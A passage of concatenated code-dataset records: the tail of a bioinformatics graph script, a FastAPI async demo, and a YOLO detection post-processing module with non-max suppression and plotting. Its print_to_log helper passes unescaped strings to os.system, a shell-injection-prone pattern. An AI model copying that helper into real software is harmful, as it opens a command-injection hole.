|')\r\n\t\tprint('%s--%s--%s' % (node2, net[8], net[9]))\r\n\t\t'''\r\n\t\tprint(' \\t%s\\t%s' % (net[0], node1))\r\n\t\tprint('%s\\t%s\\t%s' % (net[1], net[6], net[7]))\r\n\t\tprint('%s\\t%s\\t%s' % (node2, net[8], net[9]))\r\n\t\t'''\r\n\t\tprint('\\n')\r\n\r\ndef Function4():\r\n\tstorelist = Function2(False)\r\n\tsquares = []\r\n\tfor pairs in storelist:\r\n\t\tsquares.append(OneSquare(pairs))\r\n\tfor i in range(len(squares)):\r\n\t\tsq1 = squares[i]\r\n\t\tfor j in range(i + 1, len(squares)):\r\n\t\t\tsq2 = squares[j]\r\n\t\t\tif sq2.n0 == sq1.n1:\r\n\t\t\t\tif sq1.n3 not in (sq2.n1, sq2.n2):\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t#elif sq1.n3 == sq2.n1:\r\n\t\t\t\t#\tsquares[j] = sq2 = sq2.trans()\r\n\t\t\t\tsq1.right.append(sq2)\r\n\t\t\t\tsq2.left.append(sq1)\r\n\t\t\telif sq2.n0 == sq1.n2:\r\n\t\t\t\tif sq1.n3 not in (sq2.n1, sq2.n2):\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t#elif sq1.n3 == sq2.n2:\r\n\t\t\t\t#\tsquares[j] = sq2 = sq2.trans()\r\n\t\t\t\tsq1.down.append(sq2)\r\n\t\t\t\tsq2.up.append(sq1)\r\n\tsquares = list(filter(lambda x: x.right + x.left + x.up + x.down != [], squares))\r\n\treturn squares\r\n\t\r\ndef Function5():\r\n\tsquares = Function4()\r\n\ttry:\r\n\t\tg = pgv.AGraph()\r\n\t\tfor square in squares:\r\n\t\t\tg.add_node(square.detail(False, True))\r\n\t\tfor square in squares:\r\n\t\t\tfor value in square.right + square.down:\r\n\t\t\t\tif value.n0 == square.n1:\r\n\t\t\t\t\tif value.n2 == square.n3:\r\n\t\t\t\t\t\tg.add_edge(square.detail(False, True), value.detail(False, True), color = 'red')\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tg.add_edge(square.detail(False, True), value.detail(False, True), color = 'orange')\r\n\t\t\t\telse:\r\n\t\t\t\t\tif value.n1 == square.n3:\r\n\t\t\t\t\t\tg.add_edge(square.detail(False, True), value.detail(False, True), color = 'blue')\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tg.add_edge(square.detail(False, True), value.detail(False, True), color = 'green')\r\n\t\t\t''':\r\n\t\t\t\tg.add_edge(square.detail(False, True), value.detail(False, True), color = 'red')\r\n\t\t\tfor value in square.down:\r\n\t\t\t\tg.add_edge(square.detail(False, True), value.detail(False, True), color = 'blue')\r\n\t\t\t\t'''\r\n\t\tg.layout('dot')\r\n\t\tg.draw('SquareNet.png')\r\n\texcept:\r\n\t\tprint('\\n\\n\\n\\n\\nPlease run in Linux-Bioinformatics\\n\\n\\n\\n\\n')\r\n\r\n#Function0(default err = 0.3, fulltable = False) = changeProteinNode\r\n#Function1 = printNodeTree1\r\n#Function2(default WRITE = Ture) = changeProteinNode2\r\n#Function3 = makeNet\r\n#Function4 = squareMakeNet\r\n#Function5 = printSquareNet\r\nFunction0()\r\nFunction5()","sub_path":"Bioinformatics/Lesson2/4-4-1-Try2.py","file_name":"4-4-1-Try2.py","file_ext":"py","file_size_in_byte":7513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"13087839","text":"\nimport asyncio\nimport time\nfrom datetime import datetime\n\nfrom fastapi import BackgroundTasks, FastAPI\n\napp = FastAPI()\n\n\ndef slow_stuff_sync(seconds: int, i: int):\n print(f'{datetime.now().time()} start slow stuff sync, call {i}')\n time.sleep(seconds)\n print(f'{datetime.now().time()} end slow stuff sync, call {i}')\n\n\nasync def slow_stuff_async(seconds: int, i: int):\n print(f'{datetime.now().time()} start slow stuff async, call {i}')\n await asyncio.sleep(seconds)\n print(f'{datetime.now().time()} end slow stuff async, call {i}')\n\n\n@app.get(\"/\")\ndef root():\n return {\"Hello\": \"World\"}\n\n\n@app.get(\"/perform_synchronous/\")\ndef perform_synchronous(n: int, seconds_sleep: int):\n start = time.time()\n\n [slow_stuff_sync(seconds_sleep, i) for i in range(n)]\n print('after calling slow_stuff_sync')\n\n end = time.time()\n return {\"total_seconds\": end-start}\n\n\n@app.get(\"/perform_asynchronous/\")\nasync def perform_asynchronous(n: int, seconds_sleep: int):\n start = time.time()\n\n [await slow_stuff_async(seconds_sleep, i) for i in range(n)]\n print('after calling slow_stuff_async')\n\n end = time.time()\n return {\"total_seconds\": end - start}\n\n\n@app.get(\"/perform_background_tasks/\")\nasync def perform_background_tasks(n: int, seconds_sleep: int,\n background_tasks: BackgroundTasks):\n start = time.time()\n\n # to be run after returning a response\n [background_tasks.add_task(slow_stuff_async, seconds_sleep, i) for i in range(n)]\n print('background_tasks set')\n\n end = time.time()\n return {\"total_seconds\": end-start}\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"540976935","text":"#!/usr/bin/env python3\n\nfrom __future__ import print_function\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport csv\nimport cv2\nimport sys\nimport os\nimport threading\nimport re\nimport shutil\n\nfrom memory_profiler import profile\n\ncurrent_path = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(current_path)\n\n\ndef get_global_coords(row):\n \"\"\"Get global coords of bounding box prediction from dataframe row\n #columns:Index([u'Loc_Tmp', u'Prob', u'Xmin', u'Ymin', u'Xmax', u'Ymax', u'Category', u'Image_Root_Plus_XY',\n u'Image_Root', u'Slice_XY', u'Upper', u'Left', u'Height', u'Width', u'Pad_Height', u'Pad_Width', u'Image_Path']\n \"\"\"\n\n# with iterrows\n # xmin_tmp, xmax_tmp = row['Xmin'], row['Xmax']\n # ymin_tmp, ymax_tmp = row['Ymin'], row['Ymax']\n # upper, left = row['Upper'], row['Left']\n # sliceHeight, sliceWidth = row['Height'], row['Width']\n # vis_w, vis_h = row['Im_Width'], row['Im_Height']\n # padHeight = row['Pad_Height']\n # padWidth = row['Pad_Width']\n# with itertuples\n xmin_tmp, xmax_tmp = row.Xmin, row.Xmax\n ymin_tmp, ymax_tmp = row.Ymin, row.Ymax\n upper, left = row.Upper, row.Left\n # sliceHeight, sliceWidth = row.Height, row.Width\n vis_w, vis_h = row.Im_Width, row.Im_Height\n padHeight = row.Pad_Height\n padWidth = row.Pad_Width\n\n # for aspect ratio\n # if ((float)dx / dy > max_aspect_ratio) or ((float)dy / dx > max_aspect_ratio):\n # print (\"High aspect ratio, skipping\", row, \"...\")\n # return [], []\n # set min, max x and y for each box, shifted for appropriate padding\n xmin = max(0, int(round(float(xmin_tmp)))+left - padWidth)\n xmax = min(vis_w - 1, int(round(float(xmax_tmp)))+left - padWidth)\n ymin = max(0, int(round(float(ymin_tmp)))+upper - padHeight)\n ymax = min(vis_h - 1, int(round(float(ymax_tmp)))+upper - padHeight)\n\n # set bounds, coords\n bounds = [xmin, xmax, ymin, ymax]\n coords = [[xmin, ymin], [xmax, ymin], [xmax, ymax], [xmin, ymax]]\n \n # check that nothing is negative\n if np.min(bounds) < 0:\n print(\"skipping as bound is < 0:\", row)\n return [], [] # skip these boxes\n if (xmax > vis_w) or (ymax > vis_h):\n print(\"skipping as bound is > image size:\", row)\n return [], [] # skip these boxes\n return bounds, coords\n\n\ndef augment_dataframe(df, valid_img_dir_tot='', slice_sizes=[608], valid_slice_sep='__', verbose=False):\n \"\"\"\n Add columns to dataframe\n input columns are:\n ['Loc_Tmp', 'Prob','Xmin', 'Ymin', 'Xmax', 'Ymax', 'Category']\n output columns:\n ['Loc_Tmp', 'Prob', 'Xmin', 'Ymin', 'Xmax', 'Ymax', 'Category', 'Image_Root_Plus_XY', 'Image_Root', 'Slice_XY',\n 'Upper', 'Left','Height', 'Width', 'Pad_Height', 'Pad_Width', 'Image_Path']\n \"\"\"\n\n t0 = time.time()\n print(\"Augmenting dataframe of initial length:\", len(df), \"...\")\n # extract image root\n df['Image_Root_Plus_XY'] = [f.split('/')[-1] for f in df['Loc_Tmp']]\n\n # parse out image root and location\n im_roots, im_locs = [], []\n for j, f in enumerate(df['Image_Root_Plus_XY'].values):\n ext = f.split('.')[-1]\n # get im_root, (if not slicing ignore '|')\n if slice_sizes[0] > 0:\n im_root_tmp = f.split(valid_slice_sep)[0]\n xy_tmp = f.split(valid_slice_sep)[-1]\n else:\n im_root_tmp, xy_tmp = f, '0_0_0_0_0_0_0_0'\n if im_root_tmp == xy_tmp:\n xy_tmp = '0_0_0_0_0_0_0_0'\n im_locs.append(xy_tmp) \n \n if '.' not in im_root_tmp:\n im_roots.append(im_root_tmp + '.' + ext)\n else:\n im_roots.append(im_root_tmp)\n \n if verbose:\n print(\"loc_tmp[:3]\", df['Loc_Tmp'].values[:3])\n print(\"im_roots[:3]\", im_roots[:3])\n print(\"im_locs[:3]\", im_locs[:3])\n\n df['Image_Root'] = im_roots\n df['Slice_XY'] = im_locs\n # get positions\n df['Upper'] = [float(sl.split('_')[0]) for sl in df['Slice_XY'].values]\n df['Left'] = [float(sl.split('_')[1]) for sl in df['Slice_XY'].values]\n df['Height'] = [float(sl.split('_')[2]) for sl in df['Slice_XY'].values]\n df['Width'] = [float(sl.split('_')[3]) for sl in df['Slice_XY'].values]\n df['Pad_Height'] = [float(sl.split('_')[4].split('.')[0]) for sl in df['Slice_XY'].values]\n df['Pad_Width'] = [float(sl.split('_')[5].split('.')[0]) for sl in df['Slice_XY'].values]\n df['Im_Width'] = [float(sl.split('_')[6].split('.')[0]) for sl in df['Slice_XY'].values]\n df['Im_Height'] = [float(sl.split('_')[7].split('.')[0]) for sl in df['Slice_XY'].values]\n\n # set image path, make sure the image exists\n im_paths_list = []\n im_roots_update = []\n for img_root in df['Image_Root'].values:\n # get image path\n im_path = os.path.join(valid_img_dir_tot, img_root.strip())\n if os.path.exists(im_path):\n im_roots_update.append(os.path.basename(im_path))\n im_paths_list.append(im_path)\n # if file doesn't exist, check other extensions\n else:\n found = False\n valid_extension_list = ['.jpg', '.JPG', '.png', '.tif', '.TIF', '.TIFF', '.tiff', '.JPEG', '.jpeg']\n for ext in valid_extension_list:\n im_path_tmp = im_path.split('.')[0] + ext\n if os.path.exists(im_path_tmp):\n im_roots_update.append(os.path.basename(im_path_tmp))\n im_paths_list.append(im_path_tmp)\n found = True\n break\n if not found:\n print(\"image path not found with valid extensions:\", im_path)\n # update columns\n df['Image_Path'] = im_paths_list\n df['Image_Root'] = im_roots_update\n\n # df['Image_Path'] = [os.path.join(valid_img_dir_tot, f.strip()) for f in df['Image_Root'].values]\n bad_ids = []\n # add in global location of each row\n # if slicing, get global location from filename\n if slice_sizes[0] > 0:\n x_min_tmp, x_max_tmp, y_min_tmp, y_max_tmp = [], [], [], []\n for row in df.itertuples():\n #for index, row in df.iterrows():\n bounds, coords = get_global_coords(row)\n if len(bounds) == 0 and len(coords) == 0:\n bad_ids.append(row.index)\n [xmin, xmax, ymin, ymax] = 0, 0, 0, 0\n else:\n [xmin, xmax, ymin, ymax] = bounds\n x_min_tmp.append(xmin)\n x_max_tmp.append(xmax)\n y_min_tmp.append(ymin)\n y_max_tmp.append(ymax)\n df['Xmin_Glob'] = x_min_tmp\n df['Xmax_Glob'] = x_max_tmp\n df['Ymin_Glob'] = y_min_tmp\n df['Ymax_Glob'] = y_max_tmp\n # if not sliced, global coordinates are equivalent to local coordinates\n else:\n df['Xmin_Glob'] = df['Xmin'].values\n df['Xmax_Glob'] = df['Xmax'].values\n df['Ymin_Glob'] = df['Ymin'].values\n df['Ymax_Glob'] = df['Ymax'].values\n\n # remove bad_ids\n if len(bad_ids) > 0:\n print(\"removing empty:\", bad_ids)\n df = df.drop(df.index[bad_ids])\n\n print(\"Time to augment dataframe of length:\", len(df), \" took \", time.time() - t0, \"seconds\")\n return df\n\n\ndef yolo_output_to_df(yolo_valid_classes_files, log_file, valid_img_dir_tot='',\n slice_sizes=[608], valid_slice_sep='__', min_retain_prob=1.0):\n \"\"\"\n take output files and create df\n # df.columns:\n # ['Loc_Tmp', 'Prob', 'Xmin', 'Ymin', 'Xmax', 'Ymax', 'Category', 'Image_Root_Plus_XY', 'Image_Root',\n # 'Slice_XY', 'Upper', u'Left', 'Height', 'Width', 'Pad_Height', 'Pad_Width', 'Image_Path']\n \"\"\"\n df_final = []\n for i, vfile in enumerate(yolo_valid_classes_files):\n\n valid_base_string = '\"valid_file: ' + str(vfile) + '\\n\"'\n print(valid_base_string[1:-2])\n if log_file is not None:\n print_to_log(valid_base_string, log_file)\n \n cat = vfile.split('/')[-1].split('.')[0]\n # load into dataframe\n df = pd.read_csv(vfile, sep=' ', names=['Loc_Tmp', 'Prob', 'Xmin', 'Ymin', 'Xmax', 'Ymax'])\n # set category\n df['Category'] = len(df) * [cat]\n\n # remove low probabilities:\n bad_ids = df[df['Prob'] < min_retain_prob].index\n if len(bad_ids) > 0:\n print(\"bad ids:\", bad_ids)\n df.drop(df.index[bad_ids], inplace=True)\n\n # keep only first 5 images:\n #df = df[df['Loc_Tmp'].str.contains(\"100000|100001|100002|100003|100004|100005\")]\n\n # augment\n df = augment_dataframe(df, valid_img_dir_tot=valid_img_dir_tot, slice_sizes=slice_sizes,\n valid_slice_sep=valid_slice_sep)\n\n # append to total df\n if i == 0:\n df_final = df\n else:\n df_final = df_final.append(df, ignore_index=True)\n return df_final\n\n\ndef print_to_log(message, log_file, append=True):\n if append:\n os.system('echo ' + message + ' >> ' + log_file)\n else:\n os.system('echo ' + message + ' > ' + log_file)\n\n\ndef non_max_suppression(boxes, probs=None, overlapThresh=0.5):\n \"\"\"\n Non max suppression (assume boxes = [[xmin, ymin, xmax, ymax, ...\\\n sometiems extra cols are: filename, v, prob, color]]\n # http://www.pyimagesearch.com/2015/02/16/faster-non-maximum-suppression-python/\n # Malisiewicz et al.\n see modular_sliding_window.py, functions non_max_suppression, \\\n non_max_supression_rot\n \"\"\"\n \n # if there are no boxes, return an empty list\n if len(boxes) == 0:\n return [], [], []\n \n boxes_tot = boxes\n boxes = np.asarray([b[:4] for b in boxes])\n\n # if the bounding boxes integers, convert them to floats --\n # this is important since we'll be doing a bunch of divisions\n if boxes.dtype.kind == \"i\":\n boxes = boxes.astype(\"float\")\n \n # initialize the list of picked indexes \n pick = []\n \n # grab the coordinates of the bounding boxes\n x1 = boxes[:, 0]\n y1 = boxes[:, 1]\n x2 = boxes[:, 2]\n y2 = boxes[:, 3]\n\n # compute the area of the bounding boxes and sort the bounding\n # boxes by the bottom-right y-coordinate of the bounding box\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n ids = y2\n # if probabilities are provided, sort on them instead\n if probs is not None:\n ids = probs\n ids = np.argsort(ids)\n\n # keep looping while some indexes still remain in the indexes\n # list\n while len(ids) > 0:\n # grab the last index in the indexes list and add the\n # index value to the list of picked indexes\n last = len(ids) - 1\n i = ids[last]\n pick.append(i)\n\n # find the largest (x, y) coordinates for the start of\n # the bounding box and the smallest (x, y) coordinates\n # for the end of the bounding box\n xx1 = np.maximum(x1[i], x1[ids[:last]])\n yy1 = np.maximum(y1[i], y1[ids[:last]])\n xx2 = np.minimum(x2[i], x2[ids[:last]])\n yy2 = np.minimum(y2[i], y2[ids[:last]])\n \n # compute the width and height of the bounding box\n w = np.maximum(0, xx2 - xx1 + 1)\n h = np.maximum(0, yy2 - yy1 + 1)\n \n # compute the ratio of overlap\n overlap = (w * h) / area[ids[:last]]\n\n # delete all indexes from the index list that have\n np_where = np.where((overlap > overlapThresh)\n #| ((x1[i] <= x1[ids[:last]]) & (x2[i] >= x2[ids[:last]]))# & (overlap > 0.1))\n #| ((y1[i] <= y1[ids[:last]]) & (y2[i] >= y2[ids[:last]]))# & (overlap > 0.1))\n )\n conc = np.concatenate(([last], np_where[0]))\n ids = np.delete(ids, conc)\n\n # return only the bounding boxes that were picked using the\n # integer data type\n outboxes = boxes[pick].astype(\"int\")\n outboxes_tot = [boxes_tot[itmp] for itmp in pick]\n return outboxes, outboxes_tot, pick # pick3\n'''\n pick2 = []\n # now iterate through chosen boxes and see if they overlap\n boxes2 = np.asarray([b[:4] for b in outboxes])\n\n # if the bounding boxes integers, convert them to floats --\n # this is important since we'll be doing a bunch of divisions\n if boxes2.dtype.kind == \"i\":\n boxes2 = boxes2.astype(\"float\")\n\n # grab the coordinates of the bounding boxes\n x1 = boxes2[:, 0]\n y1 = boxes2[:, 1]\n x2 = boxes2[:, 2]\n y2 = boxes2[:, 3]\n\n # compute the area of the bounding boxes and sort the bounding\n # boxes by the bottom-right y-coordinate of the bounding box\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n ids = area\n ids = np.argsort(area)\n\n # keep looping while some indexes still remain in the indexes\n # list\n while len(ids) > 0:\n # grab the last index in the indexes list and add the\n # index value to the list of picked indexes\n last = len(ids) - 1\n i = ids[last]\n pick2.append(i)\n\n x1t = x1[i]\n x2t = x2[i]\n y1t = y1[i]\n y2t = y2[i]\n # find the largest (x, y) coordinates for the start of\n # the bounding box and the smallest (x, y) coordinates\n # for the end of the bounding box\n xx1 = np.maximum(x1[i], x1[ids[:last]])\n yy1 = np.maximum(y1[i], y1[ids[:last]])\n xx2 = np.minimum(x2[i], x2[ids[:last]])\n yy2 = np.minimum(y2[i], y2[ids[:last]])\n\n # compute the width and height of the bounding box\n w = np.maximum(0, xx2 - xx1 + 1)\n h = np.maximum(0, yy2 - yy1 + 1)\n\n # compute the ratio of overlap\n overlap = (w * h) / area[ids[:last]]\n\n np_wherex = np.where((x1[i] <= x1[ids[:last]]) & (x2[i] >= x2[ids[:last]]) & (overlap > 0.1))\n np_wherey = np.where((y1[i] <= y1[ids[:last]]) & (y2[i] >= y2[ids[:last]]) & (overlap > 0.1))\n conc = np.concatenate(([last], np_wherex[0], np_wherey[0]))\n ids = np.delete(ids, conc)\n\n # return only the bounding boxes that were picked using the\n # integer data type\n #pick3 = [pick[i] for i in pick2]\n #outboxes = boxes[pick3].astype(\"int\")\n #outboxes_tot = [boxes_tot[itmp] for itmp in pick3]\n\n mask = np.ones(len(pick), np.bool)\n mask[pick2] = 0\n pick4 = np.array(pick)[mask]\n return outboxes, outboxes_tot, pick4#pick3\n'''\n\n\"\"\"Plot bounding boxes stored in dataframe should GROUP BY category prior to NMS so that Cars can be on top of\ntrucks, vehicles could overlap\"\"\"\ndef refine_df(df, groupby='Loc_Tmp', groupby_cat='Category', nms_overlap_thresh=0.5, plot_thresh=0.5,\n verbose=True, nms_ignore_categories=True):\n print(\"Running refine_df()...\")\n t0 = time.time()\n\n # group by image, and plot\n group = df.groupby(groupby)\n count = 0\n print_iter = 1\n df_ids_tot = []\n for i, g in enumerate(group):\n img_loc_string = g[0]\n data_all_classes = g[1] \n\n if (i % print_iter) == 0 and verbose:\n print(i+1, \"/\", len(group), \"Processing image:\", img_loc_string)\n print(\"num boxes:\", len(data_all_classes))\n\n if nms_ignore_categories:\n data = data_all_classes\n df_ids = data.index.values\n # classes_str = np.array(len(data) * [class_str])\n scores = data['Prob'].values\n\n xmins = data['Xmin_Glob'].values\n ymins = data['Ymin_Glob'].values\n xmaxs = data['Xmax_Glob'].values\n ymaxs = data['Ymax_Glob'].values\n\n # filter out low probs and bbx areas not between min and max area\n min_area = 0\n max_area = 9000\n file_name_img = os.path.splitext(os.path.basename(img_loc_string))[0]\n img_num = int(re.sub(\"[^0-9]\", \"\", file_name_img))\n\n if img_num < 101430:\n min_area = 6000\n max_area = 51240\n elif img_num < 101510:\n min_area = 5500\n max_area = 31000\n elif img_num < 101572:\n min_area = 3900\n max_area = 31000\n elif img_num < 103516:\n min_area = 2500\n max_area = 15000\n elif img_num < 104086:\n min_area = 2400\n max_area = 30000\n elif img_num < 104442:\n min_area = 2600\n max_area = 30000\n elif img_num < 104566:\n min_area = 2000\n max_area = 8000\n elif img_num < 105400:\n min_area = 1250\n max_area = 7000\n elif img_num < 106874:\n min_area = 1250\n max_area = 7000\n # to check\n elif img_num < 107164:\n min_area = 1800\n max_area = 12000\n elif img_num < 107735:\n min_area = 2800\n max_area = 15000\n # skip from 107735 to 108443\n elif img_num < 108443:\n continue\n elif img_num < 109061:\n continue\n elif img_num < 110461:\n min_area = 7000\n max_area = 25000\n elif img_num < 110931:\n min_area = 5000\n max_area = 25000\n elif img_num < 114075:\n min_area = 3100\n max_area = 25000\n elif img_num < 114699:\n min_area = 1000\n max_area = 8000\n elif img_num < 116479:\n min_area = 600\n max_area = 7000\n elif img_num < 116651:\n continue\n elif img_num < 117309:\n min_area = 2600\n max_area = 14000\n elif img_num < 117700:\n min_area = 1000\n max_area = 40000\n elif img_num < 118053:\n min_area = 650\n max_area = 10000\n elif img_num < 118556:\n min_area = 600\n max_area = 10000\n elif img_num < 118714:\n min_area = 1000\n max_area = 50000\n elif img_num < 118905:\n min_area = 1400\n max_area = 10000\n elif img_num < 120859:\n min_area = 2000\n max_area = 10000\n elif img_num < 121356:\n min_area = 2000\n max_area = 15000\n elif img_num < 122174:\n min_area = 2000\n max_area = 15000\n elif img_num < 122757:\n min_area = 20000\n max_area = 40000\n elif img_num < 122856:\n min_area = 10000\n max_area = 40000\n elif img_num < 123118:\n min_area = 7000\n max_area = 30000\n #else:\n # break\n\n area = (xmaxs - xmins) * (ymaxs - ymins)\n high_prob_ids = np.where((scores >= plot_thresh) & ((area > min_area) & (area < max_area)))\n # only elements that where removed:\n # high_prob_ids = np.where((scores >= plot_thresh) & ((area < min_area) | (area > max_area)))\n scores = scores[high_prob_ids]\n # classes_str = classes_str[high_prob_ids]\n xmins = xmins[high_prob_ids]\n xmaxs = xmaxs[high_prob_ids]\n ymins = ymins[high_prob_ids]\n ymaxs = ymaxs[high_prob_ids]\n # probs = scores[high_prob_ids]\n df_ids = df_ids[high_prob_ids]\n\n boxes = np.stack((ymins, xmins, ymaxs, xmaxs), axis=1)\n\n if verbose:\n print(\"boxes length:\", len(boxes))\n\n # NMS\n if nms_overlap_thresh > 0:\n boxes_nms_input = np.stack((xmins, ymins, xmaxs, ymaxs), axis=1)\n _, _, good_ids = non_max_suppression(boxes_nms_input, scores, overlapThresh=nms_overlap_thresh)\n if verbose:\n print(\"num boxes_all:\", len(xmins))\n print(\"num good_ids:\", len(good_ids))\n boxes = boxes[good_ids]\n scores = scores[good_ids]\n df_ids = df_ids[good_ids]\n # classes = classes_str[good_ids]\n\n df_ids_tot.extend(df_ids)\n count += len(df_ids)\n else:\n # groupby category as well so that detections can be overlapping of\n # different categories (i.e.: a car on a truck)\n group2 = data_all_classes.groupby(groupby_cat)\n for j, g2 in enumerate(group2):\n\n class_str = g2[0]\n data = g2[1]\n df_ids = data.index.values\n scores = data['Prob'].values\n\n if (i % print_iter) == 0 and verbose:\n print(\"Category:\", class_str)\n print(\"num boxes:\", len(data))\n\n xmins = data['Xmin_Glob'].values\n ymins = data['Ymin_Glob'].values\n xmaxs = data['Xmax_Glob'].values\n ymaxs = data['Ymax_Glob'].values\n\n # filter out low probs\n high_prob_ids = np.where(scores >= plot_thresh)\n scores = scores[high_prob_ids]\n xmins = xmins[high_prob_ids]\n xmaxs = xmaxs[high_prob_ids]\n ymins = ymins[high_prob_ids]\n ymaxs = ymaxs[high_prob_ids]\n df_ids = df_ids[high_prob_ids]\n # probs = scores[high_prob_ids]\n # classes_str = classes_str[high_prob_ids]\n\n boxes = np.stack((ymins, xmins, ymaxs, xmaxs), axis=1)\n\n if verbose:\n print(\"len boxes:\", len(boxes))\n\n # NMS\n if nms_overlap_thresh > 0:\n # Try nms with pyimagesearch algorightm\n # assume boxes = [[xmin, ymin, xmax, ymax, ...\n boxes_nms_input = np.stack((xmins, ymins, xmaxs, ymaxs), axis=1)\n _, _, good_ids = non_max_suppression(boxes_nms_input, scores, overlapThresh=nms_overlap_thresh)\n if verbose:\n print(\"num good_ids:\", len(good_ids))\n boxes = boxes[good_ids]\n scores = scores[good_ids]\n df_ids = df_ids[good_ids]\n # classes = classes_str[good_ids]\n\n df_ids_tot.extend(df_ids)\n count += len(df_ids)\n\n # print (\"len df_ids_tot:\", len(df_ids_tot))\n df_ids_tot_final = np.unique(df_ids_tot)\n # print (\"len df_ids_tot unique:\", len(df_ids_tot))\n\n # create dataframe\n if verbose:\n print(\"df ids::\", df.index)\n print(\"df_ids_tot_final:\", df_ids_tot_final)\n df_out = df.loc[df_ids_tot_final]\n\n print(\"Initial length:\", len(df), \"Final length:\", len(df_out))\n print(\"Time to run refine_df():\", time.time() - t0, \"seconds\")\n return df_out\n\n\n#@profile\ndef plot_thread(i, g, all_valid_img_no_ext, outdir, plot_thresh, print_iter, verbose, color_dict, show_labels,\n alpha_scaling, plot_line_thickness):\n img_loc_string = g[0]\n data_all_classes = g[1]\n\n # image_root = data_all_classes['Image_Root'].values[0]\n im_root = os.path.basename(img_loc_string)\n if im_root in all_valid_img_no_ext:\n all_valid_img_no_ext.remove(im_root) # remove seen images\n\n im_root_no_ext, ext = im_root.split('.')\n outfile = os.path.join(outdir, im_root_no_ext + '_thresh=' + str(plot_thresh) + '.' + ext)\n\n if os.path.isfile(outfile):\n # already plotted\n return\n\n if (i % print_iter) == 0 and verbose:\n print(\" num boxes:\", len(data_all_classes))\n\n xmins = data_all_classes['Xmin_Glob'].values\n ymins = data_all_classes['Ymin_Glob'].values\n xmaxs = data_all_classes['Xmax_Glob'].values\n ymaxs = data_all_classes['Ymax_Glob'].values\n classes = data_all_classes['Category']\n scores = data_all_classes['Prob']\n\n boxes = np.stack((ymins, xmins, ymaxs, xmaxs), axis=1)\n\n image = cv2.imread(img_loc_string, 1)\n plot_rects(image, boxes, scores, classes=classes,\n plot_thresh=plot_thresh,\n color_dict=color_dict, # colormap=colormap,\n outfile=outfile,\n show_labels=show_labels,\n alpha_scaling=alpha_scaling,\n plot_line_thickness=plot_line_thickness,\n verbose=verbose,\n im_root_no_ext=im_root_no_ext)\n\n#@profile\ndef plot_refined_df(df, valid_ims_list, valid_img_dir_tot, groupby='Loc_Tmp', label_map_dict={},\n outdir='', plot_thresh=0.5,\n show_labels=True, alpha_scaling=True, plot_line_thickness=2,\n legend_root='colormap_legend.png',\n plot=True, print_iter=1,\n verbose=True):\n if not plot:\n return\n \"\"\"Plot refined dataframe\"\"\"\n # save images to separate folder than txt files:\n #outdir = os.path.join(outdir, 'img_' + str(plot_thresh))\n #outdir = os.path.join(outdir, 'img_inv_' + str(plot_thresh))\n #outdir = os.path.join(outdir, 'img_inv2_' + str(plot_thresh))\n #outdir = os.path.join(outdir, 'img_filt_' + str(plot_thresh))\n outdir = os.path.join(outdir, 'img_wthPck' + str(plot_thresh))\n if os.path.exists(outdir):\n # comment this to keep directory\n shutil.rmtree(outdir)\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n\n print(\"Running plot_refined_df...\")\n t0 = time.time()\n # get colormap, if plotting\n outfile_legend = os.path.join(outdir, legend_root)\n colormap, color_dict = init_colors_legend(outfile_legend, label_map_dict)\n\n # group by image, and plot\n group = df.groupby(groupby)\n\n # get all images list:\n all_valid_img_no_ext = valid_ims_list\n\n jobs = []\n for i, g in enumerate(group):\n # split data\n thread = threading.Thread(target=plot_thread,\n args=(i, g, all_valid_img_no_ext, outdir, plot_thresh, print_iter, verbose,\n color_dict, show_labels, alpha_scaling, plot_line_thickness))\n jobs.append(thread)\n\n # Start the threads\n threads = 4\n counter = 0\n thread_tasks_split = [jobs[i:i + threads] for i in range(0, len(jobs), threads)]\n while thread_tasks_split:\n tasks = thread_tasks_split.pop(0)\n for t in tasks:\n t.start()\n for t in tasks:\n t.join()\n counter = counter + 4\n print(\"Done plotting: \" + str(counter) + \"/\" + str(len(jobs)))\n\n #for tasks in thread_tasks_split:\n # for t in tasks:\n # t.start()\n # for t in tasks:\n # t.join()\n # counter = counter + 4\n\n print(\"Bounding boxes plotting complete!!!!!\")\n # ------\n '''\n for i, g in enumerate(group):\n img_loc_string = g[0]\n data_all_classes = g[1] \n image = cv2.imread(img_loc_string, 1)\n \n #image_root = data_all_classes['Image_Root'].values[0]\n im_root = os.path.basename(img_loc_string)\n if im_root in all_valid_img_no_ext:\n all_valid_img_no_ext.remove(im_root) # remove seen images\n\n im_root_no_ext, ext = im_root.split('.')\n outfile = os.path.join(outdir, im_root_no_ext + '_thresh=' + str(plot_thresh) + '.' + ext)\n\n if (i % print_iter) == 0 and verbose:\n print(i+1, \"/\", len(group), \"Processing image:\", img_loc_string)\n print(\" num boxes:\", len(data_all_classes))\n\n xmins = data_all_classes['Xmin_Glob'].values\n ymins = data_all_classes['Ymin_Glob'].values\n xmaxs = data_all_classes['Xmax_Glob'].values\n ymaxs = data_all_classes['Ymax_Glob'].values\n classes = data_all_classes['Category']\n scores = data_all_classes['Prob']\n\n boxes = np.stack((ymins, xmins, ymaxs, xmaxs), axis=1)\n\n plot_rects(image, boxes, scores, classes=classes,\n plot_thresh=plot_thresh, \n color_dict=color_dict, #colormap=colormap,\n outfile=outfile,\n show_labels=show_labels,\n alpha_scaling=alpha_scaling,\n plot_line_thickness=plot_line_thickness,\n verbose=verbose,\n im_root_no_ext=im_root_no_ext)\n '''\n print(\"copying images that detections were lost by appling threshold\")\n # now copy images that were lost when applied detection threshold\n for img in all_valid_img_no_ext:\n image = cv2.imread(os.path.join(valid_img_dir_tot, img), 1)\n\n im_root_no_ext, ext = img.split('.')\n outfile = os.path.join(outdir, im_root_no_ext + '_thresh=' + str(plot_thresh) + '.' + ext)\n\n #if (i % print_iter) == 0 and verbose:\n #print(i + 1, \"/\", len(group), \"Processing image:\", img_loc_string)\n # if verbose:\n #print(\" image.shape:\", image.shape)\n\n 